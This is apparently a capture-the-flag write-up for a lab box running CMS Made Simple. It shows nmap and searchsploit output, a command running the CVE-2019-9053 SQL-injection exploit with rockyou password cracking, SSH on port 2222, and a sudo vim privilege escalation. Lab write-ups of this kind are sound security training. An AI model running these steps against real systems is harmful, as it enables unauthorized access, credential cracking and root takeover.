Task 01: Simple CTF
How many services are running under port 1000?
sudo nmap -p 0-999 10.10.38.103 -v -oN 1000-port Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-19 18:14 BST Initiating ARP Ping Scan at 18:14 Scanning 10.10.38.103 [1 port] Completed ARP Ping Scan at 18:14, 0.22s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 18:14 Completed Parallel DNS resolution of 1 host. at 18:14, 0.00s elapsed Initiating SYN Stealth Scan at 18:14 Scanning ip-10-10-38-103.eu-west-1.compute.internal (10.10.38.103) [1000 ports] Discovered open port 21/tcp on 10.10.38.103 Discovered open port 80/tcp on 10.10.38.103 Completed SYN Stealth Scan at 18:14, 10.05s elapsed (1000 total ports) Nmap scan report for ip-10-10-38-103.eu-west-1.compute.internal (10.10.38.103) Host is up (0.00037s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 2222/tcp open EtherNetIP-1 MAC Address: 02:A2:72:52:C3:F7 (Unknown) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds Raw packets sent: 2006 (88.248KB) | Rcvd: 10 (424B)
What is running on the higher port?
Service Scan on port
sudo nmap -p 2222 -sC -sV -oN 2222 Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-19 18:56 BST WARNING: No targets were specified, so 0 hosts scanned. Nmap done: 0 IP addresses (0 hosts up) scanned in 0.75 seconds
What’s the CVE you’re using against the application?
nmap service enumeration
sudo nmap -sC -sV -oN nmap/servicescan -p 22,80,2222 10.10.38.103 1 ⨯ [sudo] password for anir0y: Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-19 23:32 IST Nmap scan report for 10.10.38.103 Host is up (0.15s latency). PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a💿a9:23 (RSA) | 256 9b:d1:65:07:51:08:00:61:98🇩🇪95:ed:3a:e3:81:1c (ECDSA) |_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.38 seconds
Good Old go-Buster the URL:
found the dir
Application is: CMS Made Simple
┌──(anir0y㉿kali)-[~/share/thm/room/easyctf] └─$ searchsploit CMS Made Simple | grep '2.2' CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authe | php/webapps/49199.txt CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
Looking at the searchsploit result we find tons of vulnerabilities. The question asked in the challenge is the CVE number. So searching more against the cms service I bumped across exploit DB and it showed me the CVE number associated with this vulnerability, also when I compared the results with the searchsploit data I decided to go for the SQL injection vulnerability
To what kind of vulnerability is the application vulnerable?
refer to Previous Findings
What’s the password?
please remember this is
python 2 tool, you might need to install
pip2 in order to install
termcolor lib. refer to this post
#run the exploit python CVE-2019-9053.py -u http://10.10.38.103/simple --crack -w /usr/share/wordlists/rockyou.txt
Where can you login with the details obtained?
SSH into the Box with Found creds:
SSH on port 22 is filtered
Try SSH into other Found Port
What’s the user flag?
Is there any other user in the home directory? What’s its name?
ls /home mitch sunbath
What can you leverage to spawn a privileged shell?
usually I start with
sudo -l to verify if the current user have any sudo privs or not.
$ sudo -l User mitch may run the following commands on Machine: (root) NOPASSWD: /usr/bin/vim
What’s the root flag?
GTFO bins for the found application!